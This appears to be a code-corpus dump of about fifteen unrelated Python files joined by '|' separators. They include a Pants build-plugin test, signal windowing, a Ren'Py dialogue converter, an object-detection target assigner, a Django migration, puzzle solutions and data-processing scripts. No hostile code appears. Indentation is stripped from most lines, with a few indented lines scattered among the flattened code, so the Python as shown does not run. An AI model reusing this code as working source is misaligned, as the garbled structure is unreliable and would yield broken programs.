StevedoreExtensionTargets,
StevedoreNamespace,
StevedoreNamespacesField,
StevedoreNamespacesProviderTargetsRequest,
)
from pants.backend.python.macros.python_artifact import PythonArtifact
from pants.backend.python.target_types import (
PythonDistribution,
PythonSourcesGeneratorTarget,
PythonSourceTarget,
PythonTestsGeneratorTarget,
PythonTestTarget,
)
from pants.backend.python.target_types_rules import rules as python_target_types_rules
from pants.engine.addresses import Address
from pants.engine.target import InferredDependencies
from pants.testutil.rule_runner import QueryRule, RuleRunner
from pants.util.frozendict import FrozenDict
# random set of runner names to use in tests
st2_runners = ["noop", "python", "foobar"]
def write_test_files(rule_runner: RuleRunner, extra_build_contents: str = ""):
for runner in st2_runners:
rule_runner.write_files(
{
f"runners/{runner}_runner/BUILD": dedent(
f"""\
python_distribution(
provides=python_artifact(
name="stackstorm-runner-{runner}",
),
entry_points={{
stevedore_namespace("st2common.runners.runner"): {{
"{runner}": "{runner}_runner.{runner}_runner",
}},
stevedore_namespace("some.thing.else"): {{
"{runner}": "{runner}_runner.thing",
}},
}},
)
"""
)
+ extra_build_contents.format(runner=runner),
f"runners/{runner}_runner/{runner}_runner/BUILD": "python_sources()",
f"runners/{runner}_runner/{runner}_runner/__init__.py": "",
f"runners/{runner}_runner/{runner}_runner/{runner}_runner.py": "",
f"runners/{runner}_runner/{runner}_runner/thing.py": "",
}
)
@pytest.fixture
def rule_runner() -> RuleRunner:
rule_runner = RuleRunner(
rules=[
*python_target_types_rules(),
*stevedore_dep_rules(),
QueryRule(AllStevedoreExtensionTargets, ()),
QueryRule(StevedoreExtensions, ()),
QueryRule(StevedoreExtensionTargets, (StevedoreNamespacesProviderTargetsRequest,)),
QueryRule(InferredDependencies, (InferStevedoreNamespacesDependencies,)),
],
target_types=[
PythonDistribution,
PythonSourceTarget,
PythonSourcesGeneratorTarget,
PythonTestTarget,
PythonTestsGeneratorTarget,
],
objects={
"python_artifact": PythonArtifact,
"stevedore_namespace": StevedoreNamespace,
},
)
write_test_files(rule_runner)
args = [
"--source-root-patterns=runners/*_runner",
]
rule_runner.set_options(args, env_inherit={"PATH", "PYENV_ROOT", "HOME"})
return rule_runner
# -----------------------------------------------------------------------------------------------
# Tests for utility rules
# -----------------------------------------------------------------------------------------------
def test_find_all_stevedore_extension_targets(rule_runner: RuleRunner) -> None:
assert rule_runner.request(AllStevedoreExtensionTargets, []) == AllStevedoreExtensionTargets(
rule_runner.get_target(Address(f"runners/{runner}_runner"))
for runner in sorted(st2_runners)
)
def test_map_stevedore_extensions(rule_runner: RuleRunner) -> None:
assert rule_runner.request(StevedoreExtensions, []) == StevedoreExtensions(
FrozenDict(
{
StevedoreNamespace("some.thing.else"): tuple(
rule_runner.get_target(Address(f"runners/{runner}_runner"))
for runner in sorted(st2_runners)
),
StevedoreNamespace("st2common.runners.runner"): tuple(
rule_runner.get_target(Address(f"runners/{runner}_runner"))
for runner in sorted(st2_runners)
),
}
)
)
def test_find_python_distributions_with_entry_points_in_stevedore_namespaces(
rule_runner: RuleRunner,
) -> None:
rule_runner.write_files(
{
"src/foobar/BUILD": dedent(
"""\
python_tests(
name="tests",
stevedore_namespaces=["some.thing.else"],
)
"""
),
"src/foobar/test_something.py": "",
}
)
# use set as the order of targets is not consistent and is not easily sorted
assert set(
rule_runner.request(
StevedoreExtensionTargets,
[
StevedoreNamespacesProviderTargetsRequest(
rule_runner.get_target(Address("src/foobar", target_name="tests")).get(
StevedoreNamespacesField
)
),
],
)
) == set(
StevedoreExtensionTargets(
(
rule_runner.get_target(Address(f"runners/{runner}_runner"))
for runner in sorted(st2_runners)
)
)
)
# -----------------------------------------------------------------------------------------------
# Tests for dependency inference of python targets (python_tests)
# -----------------------------------------------------------------------------------------------
def test_infer_stevedore_namespace_dependencies(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"src/foobar/BUILD": dedent(
"""\
python_tests(
name="tests",
stevedore_namespaces=["st2common.runners.runner"],
)
"""
),
"src/foobar/test_something.py": "",
}
)
def run_dep_inference(address: Address) -> InferredDependencies:
target = rule_runner.get_target(address)
return rule_runner.request(
InferredDependencies,
[
InferStevedoreNamespacesDependencies(
PythonTestsStevedoreNamespaceInferenceFieldSet.create(target)
)
],
)
# This asserts that these should NOT be inferred dependencies:
# - stevedore_namespace(some.thing.else) -> {runner}_runner.thing
# - the python_distribution itself at Address(f"runners/{runner}_runner")
# It should only infer the stevedore_namespace(st2common.runners.runner) deps.
assert run_dep_inference(
Address("src/foobar", target_name="tests", relative_file_path="test_something.py"),
) == InferredDependencies(
[
Address(
f"runners/{runner}_runner/{runner}_runner",
relative_file_path=f"{runner}_runner.py",
)
for runner in st2_runners
],
)
|
import numpy as np
import random as rnd
import math
freq = 44100
ecart_fenetre = 1./441.
temps_fenetre = 0.030
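# Note: the 0.5 - 0.5*cos(...) taper applied below is, strictly speaking, the Hann
# window; a true Hamming window would use 0.54 - 0.46*cos(...). The original
# function names are kept unchanged.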
def hamming_window(signal):
    k = 0
    l = len(signal)
    j = 0
while (k <l/(ecart_fenetre*freq) and j<((2*l)-(ecart_fenetre*freq))):
for i in range(int(temps_fenetre*freq)):
signal[k*int(ecart_fenetre*freq)+i]*=(0.5-0.5*np.cos(2*np.pi*(i/(freq))/temps_fenetre))
j += 1
if (j == l):
break
k+=1
return signal
def hamming_window_bis(signal):
    l = len(signal)
    k = 0
while (k <l/(ecart_fenetre*freq)):
for i in range(int(temps_fenetre*freq)):
try:
signal[k*int(ecart_fenetre*freq)+i]*=(0.5-0.5*np.cos(2*np.pi*(i/(freq))/temps_fenetre))
except IndexError:
break
k+=1
return signal
z = [250 * i / 100000 for i in range(88200)]
# Both window functions mutate their argument in place and return it, so compare
# the results on two independent copies of the test signal.
print(hamming_window(list(z)) == hamming_window_bis(list(z)))
|
if __name__ == '__main__':
# case1 -> only positives
from andrew_packages.programming_problems.greedy.\
expression_maximization.__init__ import first_positives, second
print("First set:")
print(first_positives)
print("Second set:")
print(second)
from andrew_packages.util.algorithms import GenerateSubsets
subsets_second_set = GenerateSubsets(second)
subsets_second_set = list(filter(lambda sett: len(sett) == len(first_positives), subsets_second_set))
print("Subsets of second set:")
print(subsets_second_set)
maximum_sum = 0
solution = set()
for subset in subsets_second_set:
expression = 0
for element_first, element_subset in zip(list(first_positives), list(subset)):
expression += element_first * element_subset
if expression >= maximum_sum:
maximum_sum = expression
solution = subset
print(f"\nMaximum sum is: {maximum_sum} and the subset that contributed is: {solution}")
|
import re
import os
from pathlib import Path
lineRegex = re.compile(r'\s*(.*)\s*(".+")')
rubyRegex = re.compile(r'{rb}(.+?){/rb}\s*?{rt}(.+?){/rt}')
rubyRtRegex = re.compile(r'(.){rt}(.+?){/rt}')
def cleanFile(infile, outfile):
if not os.path.exists(os.path.dirname(outfile)):
os.makedirs(os.path.dirname(outfile))
out = open(outfile, "w+")
script = open(infile)
names = set()
out.write("""
<!DOCTYPE html>
<html>
<head>
<style>
body {
background-color: #000;
color: #a1caff;
font-size: 18px;
}
</style>
</head>
<body>
""")
for line in script:
m = lineRegex.search(line)
if not m:
continue
name = m.group(1)
line = m.group(2)
# Skip some non-dialogue lines that slip through.
# No guarantee these cover every case
if name.startswith("$") or name.startswith("play"):
continue
if line.find("{rt}") > 0:
print(line)
# Replace ruby tags with html versions
        line = rubyRegex.sub(r"<ruby>\g<1><rt>\g<2></rt></ruby>", line)
        # Replace any <rt>-only lines in the same way
        line = rubyRtRegex.sub(r"<ruby>\g<1><rt>\g<2></rt></ruby>", line)
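        # A minimal example (hypothetical input, assuming Ren'Py-style ruby markup):
        #   {rb}漢字{/rb}{rt}かんじ{/rt}
        # is rewritten by the substitutions above to
        #   <ruby>漢字<rt>かんじ</rt></ruby>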
        # group(1) always returns a string (possibly empty), so test for a non-empty name
        if name:
names.add(name)
out.writelines("<div>{} {}</div>"
.format(name, line))
else:
out.writelines("<div>{}</div>".format(line))
out.write("</body>")
out.write("</html>")
if __name__ == "__main__":
source_dir = "/home/hssm/New Folder/scenario/"
output_dir = "/home/hssm/mineme/"
# Last part of path is assumed to be the game name
parts = Path(source_dir).parts
start_at = len(parts) - 1
game = parts[start_at]
for root, subdirs, files in os.walk(source_dir):
subdirs = Path(root).parts[start_at:]
for file in files:
if file.endswith(".rpy"):
current_subdir = "/".join(subdirs)
outname = Path(file).stem + ".html"
outfile = os.path.join(output_dir, current_subdir, outname)
infile = os.path.join(root, file)
cleanFile(infile, outfile)
|
# There is a honeycomb made of hexagonal rooms, as in the figure above.
# As the figure shows, the rooms can be addressed starting from the central
# room 1, with the numbers increasing by 1 as you go around the neighbouring rooms.
# Given a number N, write a program that computes how many rooms are passed
# (including the start and the end) when travelling from the central room 1
# to room N through the minimum number of rooms.
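# e.g. N = 13 -> 3: the rings hold 1, 6, 12, 18, ... rooms, so room 13 lies in the
# third ring and the shortest path from room 1 passes through 3 rooms in total.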
N = int(input())
rng = 6
dist = 1
if N == 1:
print(1)
else:
while N-1>rng:
dist+=1
rng+=6*dist
print(dist+1)
|
from universal import process, clean_csv, add_trans_chunk
import sys
import re
# The infile is the system trancript.
infile = sys.argv[1]
# Using the system output name, the relevant universal format and full transcripts are gathered.
filename_prep = re.search(r"(?<=system-output\/)(.*?)(?=\.txt)", infile).group(0)
outfile = "./results/google/universal/google-" + filename_prep + ".csv"
trans_file = "./results/google/system-trans-text/google-" + filename_prep + "-trans.txt"
# Set an initial previous utterance, as jiwer can't handle empty strings.
# "tsotf" = the start of the file.
prev = "tsotf"
utt = ""
# Google-specific processing.
# The loop below extracts each new hypothesis with its time and processes it.
# Simultaneously, finalised hypotheses are stored for final WER calculations.
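# Assumed layout of each hypothesis block in the system output, inferred from the
# regexes below (illustrative only):
#   Finished: False
#   Time: 12.34
#   Transcript: hello world.
# A block with "Finished: True" marks the final hypothesis of an utterance.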
with open(infile, 'r') as f:
for line in f:
if line.startswith("Finished"):
fin = re.search(r"(?<=Finished: )(.*)(?=\n)", line).group(0)
if line.startswith("Time"):
time = re.search(r"(?<=Time: )(.*)(?=\n)", line).group(0)
if line.startswith("Transcript"):
utt = re.search(r"(?<=Transcript: )(.*)(?=\n)", line).group(0)
utt = utt.replace(".", "")
if fin == "False":
process(outfile, time, prev, utt)
prev = utt
else:
process(outfile, time, prev, utt)
add_trans_chunk(trans_file, utt.lower())
prev = "tsotf"
# Universal output finalised.
clean_csv(outfile)
|
from __future__ import division
import sys
import subprocess
import glob, os
import shutil
## Author: Spencer Caplan, University of Pennsylvania
## Contact: spcaplan@sas.upenn.edu
outputFileNamesWithWordID = False
printDebugStatements = True
def accessDictEntry(dictToCheck, entryToCheck):
if entryToCheck in dictToCheck:
return dictToCheck[entryToCheck]
else:
return 0
##
## Main method block
##
if __name__=="__main__":
inputDir = "/mnt/nlpgridio2/nlp/users/spcaplan/VOT-editing/TrimmedWords/Fillers/"
outputDir = "/mnt/nlpgridio2/nlp/users/spcaplan/VOT-editing/OutputTargets-Edited/RenamedFillers/"
for file in os.listdir(inputDir):
if file.endswith(".wav"):
fileAttributes = file.split("-")
if len(fileAttributes) > 4:
globalIndex = fileAttributes[0]
localIndex = fileAttributes[1]
phone = fileAttributes[2]
trialType = fileAttributes[3]
word = fileAttributes[4]
word = word.replace('.wav','')
oldFile = os.path.join(inputDir, file)
newFileID = localIndex + '-' + trialType + '.wav'
newOutFile = os.path.join(outputDir, newFileID)
print oldFile
print newOutFile
print '\n'
shutil.copy(oldFile, newOutFile)
print 'Completed.'
quit()
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Base target assigner module.
The job of a TargetAssigner is, for a given set of anchors (bounding boxes) and
groundtruth detections (bounding boxes), to assign classification and regression
targets to each anchor as well as weights to each anchor (specifying, e.g.,
which anchors should not contribute to training loss).
It assigns classification/regression targets by performing the following steps:
1) Computing pairwise similarity between anchors and groundtruth boxes using a
provided RegionSimilarity Calculator
2) Computing a matching based on the similarity matrix using a provided Matcher
3) Assigning regression targets based on the matching and a provided BoxCoder
4) Assigning classification targets based on the matching and groundtruth labels
Note that TargetAssigners only operate on detections from a single
image at a time, so any logic for applying a TargetAssigner to multiple
images must be handled externally.
"""
import tensorflow as tf
import numpy as np
from object_detection import np_box_list as box_list
from object_detection import shape_utils
KEYPOINTS_FIELD_NAME = 'keypoints'
class TargetAssigner(object):
"""Target assigner to compute classification and regression targets."""
def __init__(self, similarity_calc, matcher, box_coder, negative_class_weight=1.0, unmatched_cls_target=None):
"""Construct Object Detection Target Assigner.
Args:
similarity_calc: a RegionSimilarityCalculator
matcher: Matcher used to match groundtruth to anchors.
box_coder: BoxCoder used to encode matching groundtruth boxes with
respect to anchors.
negative_class_weight: classification weight to be associated to negative
anchors (default: 1.0). The weight must be in [0., 1.].
unmatched_cls_target: a float32 tensor with shape [d_1, d_2, ..., d_k]
which is consistent with the classification target for each
anchor (and can be empty for scalar targets). This shape must thus be
compatible with the groundtruth labels that are passed to the "assign"
function (which have shape [num_gt_boxes, d_1, d_2, ..., d_k]).
If set to None, unmatched_cls_target is set to be [0] for each anchor.
Raises:
ValueError: if similarity_calc is not a RegionSimilarityCalculator or
if matcher is not a Matcher or if box_coder is not a BoxCoder
"""
self._similarity_calc = similarity_calc
self._matcher = matcher
self._box_coder = box_coder
self._negative_class_weight = negative_class_weight
if unmatched_cls_target is None:
# self._unmatched_cls_target = tf.constant([0], tf.float32)
self._unmatched_cls_target = np.array([0], dtype=np.float32)
else:
self._unmatched_cls_target = unmatched_cls_target
@property
def box_coder(self):
return self._box_coder
def assign(self, anchors, groundtruth_boxes, groundtruth_labels=None,groundtruth_weights=None, **params):
"""Assign classification and regression targets to each anchor.
For a given set of anchors and groundtruth detections, match anchors
to groundtruth_boxes and assign classification and regression targets to
each anchor as well as weights based on the resulting match (specifying,
e.g., which anchors should not contribute to training loss).
Anchors that are not matched to anything are given a classification target
of self._unmatched_cls_target which can be specified via the constructor.
Args:
anchors: a BoxList representing N anchors
groundtruth_boxes: a BoxList representing M groundtruth boxes
groundtruth_labels: a tensor of shape [M, d_1, ... d_k]
with labels for each of the ground_truth boxes. The subshape
[d_1, ... d_k] can be empty (corresponding to scalar inputs). When set
to None, groundtruth_labels assumes a binary problem where all
ground_truth boxes get a positive label (of 1).
groundtruth_weights: a float tensor of shape [M] indicating the weight to
assign to all anchors match to a particular groundtruth box. The weights
must be in [0., 1.]. If None, all weights are set to 1.
**params: Additional keyword arguments for specific implementations of
the Matcher.
Returns:
cls_targets: a float32 tensor with shape [num_anchors, d_1, d_2 ... d_k],
where the subshape [d_1, ..., d_k] is compatible with groundtruth_labels
which has shape [num_gt_boxes, d_1, d_2, ... d_k].
cls_weights: a float32 tensor with shape [num_anchors]
reg_targets: a float32 tensor with shape [num_anchors, box_code_dimension]
reg_weights: a float32 tensor with shape [num_anchors]
match: a matcher.Match object encoding the match between anchors and
groundtruth boxes, with rows corresponding to groundtruth boxes
and columns corresponding to anchors.
Raises:
ValueError: if anchors or groundtruth_boxes are not of type
box_list.BoxList
"""
print("printing anchors in target assigner assign: {}".format(anchors.get()) )
if not isinstance(anchors, box_list.BoxList):
raise ValueError('anchors must be an BoxList')
if not isinstance(groundtruth_boxes, box_list.BoxList):
raise ValueError('groundtruth_boxes must be an BoxList')
# if groundtruth_labels is None:
# groundtruth_labels = tf.ones(tf.expand_dims(groundtruth_boxes.num_boxes(),
# 0))
# groundtruth_labels = tf.expand_dims(groundtruth_labels, -1)
# unmatched_shape_assert = shape_utils.assert_shape_equal(
# shape_utils.combined_static_and_dynamic_shape(groundtruth_labels)[1:],
# shape_utils.combined_static_and_dynamic_shape(
# self._unmatched_cls_target))
# labels_and_box_shapes_assert = shape_utils.assert_shape_equal(
# shape_utils.combined_static_and_dynamic_shape(
# groundtruth_labels)[:1],
# shape_utils.combined_static_and_dynamic_shape(
# groundtruth_boxes.get())[:1])
if groundtruth_weights is None:
num_gt_boxes = groundtruth_boxes.num_boxes()
# if not num_gt_boxes:
# num_gt_boxes = groundtruth_boxes.num_boxes()
groundtruth_weights = np.ones(num_gt_boxes, dtype=np.float32)
# with tf.control_dependencies(
# [unmatched_shape_assert, labels_and_box_shapes_assert]):
match_quality_matrix = self._similarity_calc.compare(groundtruth_boxes,anchors)
match = self._matcher.match(match_quality_matrix, **params)
reg_targets = self._create_regression_targets(anchors,groundtruth_boxes,match)
cls_targets = self._create_classification_targets(groundtruth_labels,match)
reg_weights = self._create_regression_weights(match, groundtruth_weights)
cls_weights = self._create_classification_weights(match,groundtruth_weights)
num_anchors = anchors.num_boxes()
if num_anchors is not None:
reg_targets = self._reset_target_shape(reg_targets, num_anchors)
cls_targets = self._reset_target_shape(cls_targets, num_anchors)
reg_weights = self._reset_target_shape(reg_weights, num_anchors)
cls_weights = self._reset_target_shape(cls_weights, num_anchors)
return cls_targets, cls_weights, reg_targets, reg_weights, match
def _reset_target_shape(self, target, num_anchors):
"""Sets the static shape of the target.
Args:
target: the target tensor. Its first dimension will be overwritten.
num_anchors: the number of anchors, which is used to override the target's
first dimension.
Returns:
A tensor with the shape info filled in.
"""
        # target.shape is an immutable tuple, so copy it to a list before editing
        target_shape = list(target.shape)
        target_shape[0] = num_anchors
target = np.reshape(target, target_shape)
# target.set_shape(target_shape)
return target
def _create_regression_targets(self, anchors, groundtruth_boxes, match):
"""Returns a regression target for each anchor.
Args:
anchors: a BoxList representing M anchors
groundtruth_boxes: a BoxList representing N groundtruth_boxes
match: a matcher.Match object
Returns:
reg_targets: a float32 tensor with shape [M, box_code_dimension]
"""
print("_create_regression_targets groundtruth_boxes shape:{}".format(groundtruth_boxes.get().shape))
matched_gt_boxes = match.gather_based_on_match(groundtruth_boxes.get(),unmatched_value=np.zeros(4),ignored_value=np.zeros(4)) # expected shape: (M,4), where M=size of anchors
print("matched_gt_boxes: {}".format(matched_gt_boxes))
print("matched_gt_boxes shape:{}".format(matched_gt_boxes.shape))
print("matched_gt_boxes type:{}".format(matched_gt_boxes.dtype))
matched_gt_boxlist = box_list.BoxList(matched_gt_boxes)
print("after converting to boxlist, matched_gt_boxlist data:{}".format(matched_gt_boxlist.get()))
if groundtruth_boxes.has_field(KEYPOINTS_FIELD_NAME):
print("inside groundtruch has field logic")
groundtruth_keypoints = groundtruth_boxes.get_field(KEYPOINTS_FIELD_NAME)
matched_keypoints = match.gather_based_on_match(
groundtruth_keypoints,
                unmatched_value=np.zeros(groundtruth_keypoints.shape[1:]),
                ignored_value=np.zeros(groundtruth_keypoints.shape[1:]))
matched_gt_boxlist.add_field(KEYPOINTS_FIELD_NAME, matched_keypoints)
print("matched_gt_boxlist:{} , anchors={}".format(matched_gt_boxlist, anchors.get()))
matched_reg_targets = self._box_coder.encode(matched_gt_boxlist, anchors)
# match_results_shape = shape_utils.combined_static_and_dynamic_shape(
# match.match_results)
match_results_shape = match.match_results.shape
print("match_results_shape:{}".format(match_results_shape))
# Zero out the unmatched and ignored regression targets.
# unmatched_ignored_reg_targets = tf.tile(self._default_regression_target(), [match_results_shape[0], 1])
unmatched_ignored_reg_targets = np.tile(self._default_regression_target(), [match_results_shape[0], 1])
print("unmatched_ignored_reg_targets shape={}".format(unmatched_ignored_reg_targets.shape))
matched_anchors_mask = match.matched_column_indicator()
print("matched_anchors_mask shape:{}".format(matched_anchors_mask.shape))
print("matched_anchors_mask:{}".format(matched_anchors_mask))
# reg_targets = tf.where(matched_anchors_mask, matched_reg_targets, unmatched_ignored_reg_targets)
        # np.where broadcasts elementwise (unlike tf.where with a 1-D condition),
        # so expand the mask to shape [num_anchors, 1] to select whole rows
        reg_targets = np.where(matched_anchors_mask[:, np.newaxis], matched_reg_targets, unmatched_ignored_reg_targets)
print("reg_targets shape={}".format(reg_targets.shape))
return reg_targets
def _default_regression_target(self):
"""Returns the default target for anchors to regress to.
Default regression targets are set to zero (though in
this implementation what these targets are set to should
not matter as the regression weight of any box set to
regress to the default target is zero).
Returns:
default_target: a float32 tensor with shape [1, box_code_dimension]
"""
# return tf.constant([self._box_coder.code_size*[0]], tf.float32)
return np.array([self._box_coder.code_size*[0]], dtype=np.float32)
def _create_classification_targets(self, groundtruth_labels, match):
"""Create classification targets for each anchor.
        Assign a classification target for each anchor to the matching
groundtruth label that is provided by match. Anchors that are not matched
to anything are given the target self._unmatched_cls_target
Args:
groundtruth_labels: a tensor of shape [num_gt_boxes, d_1, ... d_k]
with labels for each of the ground_truth boxes. The subshape
[d_1, ... d_k] can be empty (corresponding to scalar labels).
match: a matcher.Match object that provides a matching between anchors
and groundtruth boxes.
Returns:
a float32 tensor with shape [num_anchors, d_1, d_2 ... d_k], where the
subshape [d_1, ..., d_k] is compatible with groundtruth_labels which has
shape [num_gt_boxes, d_1, d_2, ... d_k].
"""
print("inside _create_classification_targets ")
print("groundtruth_labels:{}".format(groundtruth_labels))
# wrapped_groundtruth_labels = np.expand_dims(groundtruth_labels, axis=1)
# print("wrapped_groundtruth_labels shape:{}".format(wrapped_groundtruth_labels.shape))
print("unmatched_cls_target shape:{}".format(self._unmatched_cls_target.shape))
return match.gather_based_on_match(groundtruth_labels,unmatched_value=self._unmatched_cls_target,ignored_value=self._unmatched_cls_target)
def _create_regression_weights(self, match, groundtruth_weights):
"""Set regression weight for each anchor.
Only positive anchors are set to contribute to the regression loss, so this
method returns a weight of 1 for every positive anchor and 0 for every
negative anchor.
Args:
match: a matcher.Match object that provides a matching between anchors
and groundtruth boxes.
groundtruth_weights: a float tensor of shape [M] indicating the weight to
assign to all anchors match to a particular groundtruth box.
Returns:
a float32 tensor with shape [num_anchors] representing regression weights.
"""
return match.gather_based_on_match(
groundtruth_weights, ignored_value=0., unmatched_value=0.)
def _create_classification_weights(self,
match,
groundtruth_weights):
"""Create classification weights for each anchor.
Positive (matched) anchors are associated with a weight of
positive_class_weight and negative (unmatched) anchors are associated with
a weight of negative_class_weight. When anchors are ignored, weights are set
to zero. By default, both positive/negative weights are set to 1.0,
but they can be adjusted to handle class imbalance (which is almost always
the case in object detection).
Args:
match: a matcher.Match object that provides a matching between anchors
and groundtruth boxes.
groundtruth_weights: a float tensor of shape [M] indicating the weight to
assign to all anchors match to a particular groundtruth box.
Returns:
a float32 tensor with shape [num_anchors] representing classification
weights.
"""
return match.gather_based_on_match(
groundtruth_weights,
ignored_value=0.,
unmatched_value=self._negative_class_weight)
def get_box_coder(self):
"""Get BoxCoder of this TargetAssigner.
Returns:
BoxCoder object.
"""
return self._box_coder
|
import asyncio
import aiohttp
import time
ev = asyncio.get_event_loop()
async def make_request():
async with aiohttp.ClientSession() as session:
async with session.get('http://localhost:8000/') as resp:
print(time.strftime("%H:%M:%S"), await resp.text())
async def request_producer():
while True:
ev.create_task(make_request())
await asyncio.sleep(1.0)
ev.create_task(request_producer())
ev.run_forever()
|
from .cyclic_lr import CyclicLR
from .learningratefinder import LearningRateFinder
|
class Solution:
def canIWin(self, maxChoosableInteger: int, desiredTotal: int) -> bool:
if maxChoosableInteger >= desiredTotal: return True
if (1 + maxChoosableInteger) * maxChoosableInteger / 2 < desiredTotal: return False
def dfs(state, desiredTotal, dp):
if dp[state] != None:
return dp[state]
for i in range(1, maxChoosableInteger + 1):
cur = 1 << (i - 1)
if cur & state != 0:
continue
if i >= desiredTotal or not dfs(cur | state, desiredTotal - i, dp):
dp[state] = True
return True
dp[state] = False
return False
return dfs(0, desiredTotal, [None] * (1 << maxChoosableInteger))
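# Example from the well-known problem statement: with integers 1..10 and a desired
# total of 11, whoever moves first always loses, so Solution().canIWin(10, 11) is False.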
|
# Generated by Django 2.0.2 on 2018-03-19 08:26
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='ClassesDescription',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField(max_length=300)),
('description', models.TextField(max_length=500, null=True)),
],
),
migrations.CreateModel(
name='Company',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField(max_length=300)),
('description', models.TextField(max_length=500, null=True)),
],
),
migrations.CreateModel(
name='EcosystemsDescription',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField(max_length=300)),
('description', models.TextField(max_length=500, null=True)),
],
),
migrations.CreateModel(
name='ParametersDescription',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField(max_length=300)),
('mandatory', models.BooleanField()),
],
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField(max_length=300)),
('company', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='products', to='partnerdb.Company')),
],
),
migrations.CreateModel(
name='ProductClasses',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('description', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='partnerdb.ClassesDescription')),
('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='classes', to='partnerdb.Product')),
],
),
migrations.CreateModel(
name='ProductEcosystems',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('description', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='partnerdb.EcosystemsDescription')),
('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ecosystems', to='partnerdb.Product')),
],
),
migrations.CreateModel(
name='ProductLogs',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('timestamp', models.DateTimeField(auto_now_add=True)),
('logrecords', models.TextField(max_length=500)),
('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='logs', to='partnerdb.Product')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='ProductParameters',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('value', models.TextField(max_length=500)),
('description', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='partnerdb.ParametersDescription')),
('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='parameters', to='partnerdb.Product')),
],
),
migrations.AddField(
model_name='classesdescription',
name='ecosystem',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='partnerdb.EcosystemsDescription'),
),
]
|
import turtle, random, math
def main():
limit = 1
scale = 150
iterations = 5000
sidelength = scale * 2
count = 0
radius = limit * scale
# print(area)
turtle.tracer(0)
turtle.setworldcoordinates(-(scale), -(scale), (scale), (scale))
turtle.hideturtle()
turtle.penup()
turtle.goto(0, -(scale))
turtle.pendown()
turtle.circle(radius)
turtle.penup()
turtle.goto(-(scale), -(scale))
turtle.pendown()
turtle.forward(sidelength)
turtle.left(90)
turtle.forward(sidelength)
turtle.left(90)
turtle.forward(sidelength)
turtle.left(90)
turtle.forward(sidelength)
turtle.left(90)
bullseye = 0
    # sample exactly `iterations` points (count starts at 0)
    while count < iterations:
turtle.penup()
turtle.goto((random.randint(-(scale), (scale))), (random.randint(-(scale), (scale))))
turtle.pendown()
# turtle.position()
# print(turtle.position())
if math.sqrt(turtle.xcor()**2 + turtle.ycor()**2) <= radius:
turtle.dot(5,"green")
bullseye += 1
else:
turtle.dot(5,"red")
count += 1
turtle.update()
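    # The hit fraction estimates the area ratio circle/square = pi*r^2 / (2r)^2 = pi/4,
    # so pi is approximated by 4 * hits / samples below.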
pi = 4 * bullseye/iterations
print(pi)
if __name__ == "__main__":
main()
|
import string
import pandas as pd
import numpy as np
from babel.numbers import format_currency
# Function to convert currency into Rupee format
def in_rupees(curr):
curr_str = format_currency(curr, 'INR', locale='en_IN').replace(u'\xa0', u' ')
return(remove_decimal(curr_str))
def remove_decimal(S):
S = str(S)
S = S[:-3]
return S
def col2num(col):
num = 0
for c in col:
if c in string.ascii_letters:
num = num * 26 + (ord(c.upper()) - ord('A')) + 1
return num
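# e.g. col2num("C") == 3 and col2num("BP") == 68 (Excel-style column letters)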
# Function to reshape an array to a single-column matrix
def re_shape(input_vec):
output_vec = input_vec.reshape(input_vec.shape[0], 1)
return output_vec
# Function to extract data from the Supply Use Table excel file
def import_Excel_SUT(filename, sheet_name_sup, sheet_name_use, sheet_name_rates,
sheet_name_exempt, sheet_name_reg_ratio):
# First prepare the Excel file by Selecting the entire sheet and unmerging any merged cells
'''
SUPPLY table
'''
df_supply = pd.read_excel(filename, sheet_name_sup, index_col=False,
header=None)
df_supply.fillna(0, inplace=True)
supply_mat_start_col_excel="C"
supply_mat_end_col_excel = "BP"
supply_mat_start_col = col2num(supply_mat_start_col_excel)
supply_mat_end_col=col2num(supply_mat_end_col_excel)
supply_mat_start_row=4
supply_mat_end_row=143
supply_mat = df_supply.iloc[supply_mat_start_row-1:supply_mat_end_row,
supply_mat_start_col-1:supply_mat_end_col]
supply_mat = supply_mat.values
supply_col_product_id_excel = "B"
supply_col_product_id = col2num(supply_col_product_id_excel)
supply_row_industry_id = 2
# Import Vector
import_col_excel = "BX"
import_col = col2num(import_col_excel)
import_vec = df_supply.iloc[supply_mat_start_row-1:supply_mat_end_row,import_col-1]
import_vec = import_vec.values
